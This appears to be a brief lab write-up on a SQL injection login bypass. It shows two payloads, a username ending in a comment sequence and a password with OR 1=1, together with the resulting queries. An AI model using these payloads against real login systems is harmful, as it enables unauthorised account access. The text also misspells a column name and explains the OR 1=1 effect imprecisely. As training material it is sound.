SQL injection vulnerability allowing login bypass
Let's login using the following credentials:
| Username | Password |
|---|---|
| test | test |
The resultant SQL query will be:
SELECT username FROM users WHERE username = 'test' AND password = 'test'
This will obviously not log us in as the administrator.
Method 1
We can next try the following credentials:
| Username | Password |
|---|---|
| administrator'-- | password |
The resultant SQL query will be:
SELECT username FROM users WHERE username = 'administrator'--' AND passsword = 'password'
Since we are commenting out the WHERE clause that requires the password, we will be logged in even if the password is not password.
Method 2
We can next try the following credentials:
| Username | Password |
|---|---|
| administrator | password' OR 1=1-- |
The resultant SQL query will be:
SELECT username FROM users WHERE username = 'administrator' AND passsword = 'password' OR 1=1--'
Since the result of 1=1 is always true/1 and anything OR with 1 is 1, the query will always be executed even if the password isn't password.
We have solved the lab.